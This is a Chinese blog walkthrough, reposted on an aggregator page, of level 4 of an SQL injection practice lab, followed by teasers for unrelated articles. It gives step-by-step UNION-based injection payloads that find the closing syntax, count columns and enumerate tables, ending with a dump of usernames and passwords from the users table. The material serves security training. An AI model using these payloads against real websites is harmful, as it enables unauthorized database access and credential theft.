SQL靶场第四关

SQL靶场第四关

news/2024/12/22 10:32:45/文章来源:https://blog.csdn.net/mirliasheong/article/details/144223286

sql靶场第四关攻略

输入?id=1页面正常

输入?id=1'发现页面也正常

输入?id=1"，页面异常，说明存在sql报错注入

在输入?id=1" --+页面还是报错

1.判断闭合点

我们需要找到闭合点，尝试在双引号后面加个)

输入?id=1") --+我们发现页面正常了

这里我们就知道了")就是它的闭合点

2.判断列数

输入?id=1") order by 3--+页面正常

输入?id=1") order by 4--+页面异常，说明存在三列

3.判断回显点

输入?id=-1") union select 1,2,3--+发现回显点2和3在这

4.查询数据库名

输入?id=-1") union select 1,database(),3 --+

4.查询表名

输入?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5.查询列名

输入?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6.查询数据

输入?id=-1") union select 1,group_concat(id,'~',username,'~',password),3 from users --+

以上就是sql靶场第四关的通关流程

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.xdnf.cn/news/36003.html

如若内容造成侵权/违法违规/事实不符，请联系一条长河网进行投诉反馈，一经查实，立即删除！

相关文章

Trunk链路操作题

Trunk链路操作题

Trunk链路操作题论证：

阅读更多...

Alogrithm：三色棋

Alogrithm：三色棋

1. 说明三色旗的问题最早由 E.W.Diikstra 所提出，他所使用的用语为 Dutch Nation Flag（Dijkstra 为荷兰人），而多数的作者则使用 Three-Color Flag 来称之。假设有一条绳子，上面有红、白、蓝三种颜色的旗子&#xff0…

阅读更多...

需要排序的子数组

需要排序的子数组

题目描述给定一个无序数组arr，求出需要排序的最短子数组长度要求：O(N) 如输入：arr{2,3,7,5,4,6}，返回4，因为只有{7,5,4,6}需要排序。分析以{2,3,7,5,4,6,8,9}为例： 前端小于最小波谷（3…

阅读更多...

Python酷库之旅-第三方库Pandas(154)

Python酷库之旅-第三方库Pandas(154)

目录一、用法精讲 701、pandas.Timestamp.utcnow方法 701-1、语法 701-2、参数 701-3、功能 701-4、返回值 701-5、说明 701-6、用法 701-6-1、数据准备 701-6-2、代码示例 701-6-3、结果输出 702、pandas.Timestamp.utcoffset方法 702-1、语法 702-2、参数 70…

阅读更多...

如何启动神通数据库？神通数据库的启动方式一共有几种？

如何启动神通数据库？神通数据库的启动方式一共有几种？

简单总结，神通数据库启动有三种方式： 1、dba管理工具方式 2、服务方式 （1）service oscardb_OSRDBd restart （2）/etc/init.d/oscardb_OSRDBd restart （3）systemctl start oscardb_OS…

阅读更多...

Modbus Poll的使用

Modbus Poll的使用

最近从串口调试助手接触到了Modbus Poll，一开始用的时候有些生疏，了解之后不得不说真香。相对于串口调试助手，有些设备厂家会给一些点表和指令码，有些也可以通过modbus协议解析出来，相对来说，使用Modbus …

阅读更多...

第四学期-智能数据分析-期末复习题

第四学期-智能数据分析-期末复习题

智能数据分析期末复习（2024春） 【考试形式】：闭卷，90分钟，笔试【题型分布】： 单选题10题，每题3分，共计30分判断题10题，每题2分，共计20分填空题5题&…

阅读更多...

总结的一些MySql面试题

总结的一些MySql面试题

目录一：基础篇二：索引原理和SQL优化三：事务原理四：缓存策略一：基础篇 1：定义：按照数据结构来组织、存储和管理数据的仓库；是一个长期存储在计算机内的、有组织的、可共享的…

阅读更多...

C#实现一个HttpClient集成通义千问-开发前准备

C#实现一个HttpClient集成通义千问-开发前准备

集成一个在线大模型（如通义千问），来开发一个chat对话类型的ai应用，我需要先了解OpenAI的API文档，请求和返回的参数都是以相关接口文档的标准进行的相关文档 OpenAI API文档 https://platform.openai.com/docs/api-…

阅读更多...

python游戏设计---飞机大战

1.前言上次做飞机大战游戏有人这么说： 好好好！今天必须整一个，今天我们来详细讲解一下，底部找素材文件下载！！！ 2.游戏制作目录如下： 1.导入的包 import pygame import sys imp…

阅读更多...

Final Vision Get Picture Pos Send 2 Python Control Robot

Final Vision Get Picture Pos Send 2 Python Control Robot

import tkinter as tk from tkinter import messagebox, filedialog from tkinter import ttk import socket import threading import subprocess from datetime import datetime from PIL import Image, ImageTk import time # 全局变量 client_socket None connected Fal…

阅读更多...

Spring框架-IoC的使用（基于XML和注解两种方式）

Spring框架-IoC的使用（基于XML和注解两种方式）

一、Spring IoC使用-基于XML 1 IoC使用-基于XML 使用SpringIoC组件创建并管理对象 1.1 创建实体类 package com.feng.ioc.bean;import java.util.Date;/*** program: spring-ioc-demo1* description: 学生实体类* author: FF* create: 2024-12-04 18:53**/ public class Stud…

阅读更多...

C++编程控制舵机的实现与应用

C++编程控制舵机的实现与应用

在嵌入式编程和物联网应用中，舵机是一种非常重要的执行器，广泛应用于机器人、遥控玩具、机械臂、摄像头云台等多个领域。舵机不仅能够精准地控制角度位置，还能在一定的工作范围内持续保持该位置。在本篇文章中，我们将站在 C 编程教…

阅读更多...

对于MySQL中视图的相关实验

对于MySQL中视图的相关实验

以下用该表举例： /*Table structure for table employees */ DROP TABLE IF EXISTS employees; CREATE TABLE employees ( employee_id int(6) NOT NULL DEFAULT 0, first_name varchar(20) DEFAULT NULL, last_name varchar(25) NOT NULL, email varc…

阅读更多...

day-90 使数组为空的最少操作次数

day-90 使数组为空的最少操作次数

思路统计每个数字出现的次数，计算每个数字的操作次数，将所有操作次数累加返回即可解题过程对于每个数字（假设出现次数num）,如果num等于1,返回-1；如果num%3等于0，返回num/3；如果num%3不等于0…

阅读更多...

6.xftp使用教程

6.xftp使用教程

xftp用于windows和linux之间进行文件互传 1.先安装xftp软件，并双击打开 2.文件 – 新建 3.配置参数 4.连接 5.把需要的文件扯到右边

阅读更多...

[nmap] 端口扫描工具的下载及详细安装使用过程（附有下载文件）

[nmap] 端口扫描工具的下载及详细安装使用过程（附有下载文件）

前言 nmap网络连接端扫描软件，用于主机发现、端口扫描、版本侦测、操作系统侦测 namp 链接：https://pan.quark.cn/s/4ea55a2d62c3 提取码：aXnr 下载压缩包后解压 ！！安装路径不要有中文链接失效（可能被官…

阅读更多...

详解组合模式

详解组合模式

引言有一种情况，当一组对象具有“整体—部分”关系时，如果我们处理其中一个对象或对象组合（区别对待），就可能会出现牵一发而动全身的情况，造成代码复杂。这个时候，组合模式就是一种可以用一致的…

阅读更多...

计算机网络复习——概念强化作业

计算机网络复习——概念强化作业

物理层负责网络通信的二进制传输用于将MAC地址解析为IP地址的协议为RARP。一个交换机接收到一帧,其目的地址在它的MAC地址表中查不到,交换机应该向除了来的端口外的所有其它端口转发。关于ICMP协议,下面的论述中正确的是ICMP可传送IP通信过程中出现的错误信息。在B类网络…

阅读更多...

SQL语法——DQL查询

SQL语法——DQL查询

1.查询: 基础查询： select 列名1,列名2 from 表名; # 输入列名为*时为全查条件查询： select 列名 from 表名 where 条件; #条件中含字符串时为字符串

阅读更多...

最新文章